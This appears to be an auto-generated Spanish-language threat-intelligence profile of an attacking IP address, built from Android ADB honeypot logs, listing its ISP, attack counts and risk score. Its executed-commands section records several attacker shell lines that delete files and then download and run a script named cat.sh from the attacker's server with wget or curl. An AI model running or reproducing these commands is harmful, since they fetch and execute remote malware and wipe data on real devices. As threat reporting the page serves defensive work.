TROYANOSYVIRUS
Amenaza ActivaMEDIO

130.12.180.80

Primera Deteccion16/1/2026
Ultima Actividad16/1/2026
ISPRailnet LLC
🎯
593
Ataques Totales
🔌
3
Puertos
📡
3
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇺🇸 Estados Unidos
Ciudad
Desconocida
ASN
AS214943
ISP
Railnet LLC

Tipos de Ataque

honeyaml
adbhoney
honeytrap

Puertos Atacados

8055555556

Malware Asociado

Sin malware asociado

Comandos Ejecutados

$cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android101x
$cd /data/local/tmp; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android52x
$echo hello18x
$cd /data/local; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android10x
$cd /data/local/tmp; rm -rf *; wget http://130.12.180.80/cat.sh || curl http://45.67.138.196/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android3x

Evaluacion de Riesgo

50
/100
BajoMedioAltoCritico